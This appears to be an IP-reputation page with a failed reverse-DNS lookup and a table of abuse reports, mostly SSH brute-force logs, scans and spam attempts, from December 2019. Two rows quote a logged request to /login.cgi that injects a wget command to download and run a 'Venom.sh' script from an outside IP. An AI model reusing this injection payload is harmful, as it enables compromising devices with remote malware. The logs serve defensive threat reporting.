City: unknown
Region: unknown
Country: United States of America (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 64.4.146.147
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54085
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;64.4.146.147. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020302 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 04 12:42:13 CST 2025
;; MSG SIZE rcvd: 105
Host 147.146.4.64.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 147.146.4.64.in-addr.arpa: NXDOMAIN
| IP | Type | Details | Datetime |
|---|---|---|---|
| 156.203.168.209 | attackbots | HTTP/80/443 Probe, BF, WP, Hack - |
2019-12-23 17:07:02 |
| 218.92.0.158 | attackspam | Dec 23 10:23:52 vps691689 sshd[20879]: Failed password for root from 218.92.0.158 port 57646 ssh2 Dec 23 10:23:56 vps691689 sshd[20879]: Failed password for root from 218.92.0.158 port 57646 ssh2 Dec 23 10:23:59 vps691689 sshd[20879]: Failed password for root from 218.92.0.158 port 57646 ssh2 ... |
2019-12-23 17:24:29 |
| 88.214.26.74 | attackbots | RDP Scan |
2019-12-23 16:58:37 |
| 192.169.200.145 | attack | fail2ban honeypot |
2019-12-23 17:30:36 |
| 106.13.87.170 | attackbotsspam | Dec 23 14:29:54 gw1 sshd[14891]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.87.170 Dec 23 14:29:55 gw1 sshd[14891]: Failed password for invalid user aiya from 106.13.87.170 port 51326 ssh2 ... |
2019-12-23 17:37:45 |
| 197.34.54.207 | attackbots | 1 attack on wget probes like: 197.34.54.207 - - [22/Dec/2019:16:09:51 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 17:22:03 |
| 202.142.151.162 | attackbots | Unauthorized connection attempt detected from IP address 202.142.151.162 to port 445 |
2019-12-23 17:06:23 |
| 203.142.69.203 | attackbots | Dec 23 09:41:08 sso sshd[14703]: Failed password for backup from 203.142.69.203 port 57431 ssh2 ... |
2019-12-23 17:13:58 |
| 1.58.159.97 | attack | Distributed brute force attack |
2019-12-23 17:34:50 |
| 121.166.187.237 | attackbotsspam | Dec 23 09:05:12 vtv3 sshd[8897]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.166.187.237 Dec 23 09:05:14 vtv3 sshd[8897]: Failed password for invalid user produkcja from 121.166.187.237 port 33318 ssh2 Dec 23 09:10:53 vtv3 sshd[11445]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.166.187.237 Dec 23 09:22:25 vtv3 sshd[16745]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.166.187.237 Dec 23 09:22:27 vtv3 sshd[16745]: Failed password for invalid user named from 121.166.187.237 port 46950 ssh2 Dec 23 09:28:23 vtv3 sshd[19862]: Failed password for root from 121.166.187.237 port 51486 ssh2 Dec 23 09:40:00 vtv3 sshd[25056]: Failed password for www-data from 121.166.187.237 port 60576 ssh2 Dec 23 09:45:52 vtv3 sshd[28183]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.166.187.237 Dec 23 09:45:54 vtv3 sshd[28183]: Failed password |
2019-12-23 17:21:30 |
| 156.208.164.229 | attackbots | 1 attack on wget probes like: 156.208.164.229 - - [22/Dec/2019:11:35:16 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 17:19:13 |
| 212.233.168.32 | attackspam | postfix (unknown user, SPF fail or relay access denied) |
2019-12-23 17:10:50 |
| 212.92.250.91 | attackbotsspam | Dec 22 23:20:23 sachi sshd\[31009\]: Invalid user killingberg from 212.92.250.91 Dec 22 23:20:23 sachi sshd\[31009\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ppp-212-92-250-91.wildpark.net Dec 22 23:20:25 sachi sshd\[31009\]: Failed password for invalid user killingberg from 212.92.250.91 port 38160 ssh2 Dec 22 23:25:34 sachi sshd\[31449\]: Invalid user uw from 212.92.250.91 Dec 22 23:25:34 sachi sshd\[31449\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ppp-212-92-250-91.wildpark.net |
2019-12-23 17:29:34 |
| 124.133.52.153 | attack | Dec 22 22:30:46 hpm sshd\[24835\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=124.133.52.153 user=root Dec 22 22:30:48 hpm sshd\[24835\]: Failed password for root from 124.133.52.153 port 36413 ssh2 Dec 22 22:35:54 hpm sshd\[25287\]: Invalid user weimer from 124.133.52.153 Dec 22 22:35:54 hpm sshd\[25287\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=124.133.52.153 Dec 22 22:35:56 hpm sshd\[25287\]: Failed password for invalid user weimer from 124.133.52.153 port 57622 ssh2 |
2019-12-23 17:33:14 |
| 103.242.168.20 | attack | Dec 23 16:37:59 our-server-hostname postfix/smtpd[29275]: connect from unknown[103.242.168.20] Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x Dec x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=103.242.168.20 |
2019-12-23 17:18:50 |